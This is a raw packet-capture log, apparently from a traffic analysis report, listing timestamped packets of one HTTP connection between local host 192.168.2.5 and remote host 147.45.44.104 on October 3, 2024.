                                                                                                                                Oct 3, 2024 15:07:06.251233101 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.251234055 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251246929 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251266956 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251282930 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251296997 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.251337051 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.251337051 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251349926 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251359940 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251394033 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.251409054 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.258668900 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.258783102 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.258847952 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.636305094 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636334896 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636348009 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636365891 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636379957 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636436939 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636452913 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636514902 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.636529922 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636543036 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636557102 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636570930 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636575937 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.636678934 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636693954 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636707067 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636715889 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.636723995 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636738062 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.636765957 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636780024 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636785984 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.636802912 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636817932 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.636823893 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636837959 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636852980 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636859894 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.636868000 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636883020 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636908054 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.636929989 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.636959076 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636972904 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.636986971 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637007952 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.637049913 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.637072086 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637085915 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637099028 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637114048 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637142897 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637150049 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.637159109 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637192011 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.637223005 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.637228012 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637243032 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637258053 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637295008 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.637346029 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637360096 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637373924 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637401104 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.637424946 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.637495041 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637509108 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637522936 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637537003 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637567043 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.637607098 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.637623072 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637638092 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637651920 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637666941 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637690067 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.637708902 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.637723923 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637738943 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637751102 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637794971 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.637821913 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637835979 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637850046 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637872934 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.637911081 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.637934923 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637949944 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637964010 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.637978077 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638000011 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638011932 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638015032 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.638056993 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.638092995 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638108969 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638122082 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638135910 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638150930 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638163090 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638174057 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.638211966 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.638242960 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638257980 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638278961 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638293028 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638307095 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638318062 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.638322115 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638341904 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.638376951 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.638407946 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638482094 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638495922 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638530016 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.638573885 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638587952 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638602018 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638623953 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.638641119 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.638699055 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638712883 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638726950 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638740063 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638753891 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638767958 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638775110 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.638783932 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638816118 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.638851881 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638868093 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638881922 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638895035 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638900995 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.638911009 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638927937 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.638930082 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.638969898 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.639244080 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639257908 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639273882 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639287949 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639295101 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.639302015 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639316082 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639331102 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639338970 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.639398098 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.639421940 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639436960 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639451027 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639463902 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639477968 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639492035 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639494896 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.639507055 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639522076 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639535904 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639544010 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.639549971 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639565945 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639566898 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.639580965 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639594078 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.639597893 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639651060 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.639662981 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639693022 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639708042 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639713049 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.639756918 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.639799118 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639812946 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639826059 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639847040 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639857054 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.639863014 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639875889 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639890909 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.639892101 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.639925957 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.687813044 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.723756075 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.723790884 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.723803997 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.723865032 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.723866940 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.723881960 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.723896980 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.723912001 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.723917007 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.723968029 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.724045992 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724061012 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724075079 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724087000 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724100113 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.724103928 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724133015 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.724139929 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724154949 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724169016 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724178076 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.724184036 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724217892 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.724251986 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.724726915 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724741936 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724755049 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724769115 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724800110 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.724812031 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724827051 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724838018 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.724857092 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724878073 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724895954 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.724917889 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.724917889 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724934101 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724978924 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.724980116 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.724996090 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725011110 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725064039 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725066900 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725079060 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725094080 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725112915 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725152969 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725193977 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725208044 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725220919 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725236893 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725244999 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725250959 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725265980 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725281954 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725284100 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725327015 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725363970 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725378990 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725406885 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725409985 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725420952 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725434065 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725449085 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725461960 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725502014 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725508928 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725523949 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725538969 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725550890 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725553036 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725567102 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725600004 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725635052 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725637913 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725651026 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725665092 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725678921 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725697994 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725703001 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725727081 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725737095 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725752115 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725768089 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725781918 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725794077 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725797892 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725835085 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725857019 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725857019 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725873947 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725887060 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725899935 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725914001 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725924015 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725965023 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725966930 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.725980043 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.725994110 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.726011038 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.726016998 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.726027966 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.726042986 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.726058960 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.726100922 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.726128101 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.726144075 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.726157904 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.726176023 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.726198912 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.726213932 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.726218939 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.726227999 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.726242065 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.726259947 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.726291895 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:07.726339102 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:07.726353884 CEST8049704147.45.44.104192.168.2.5
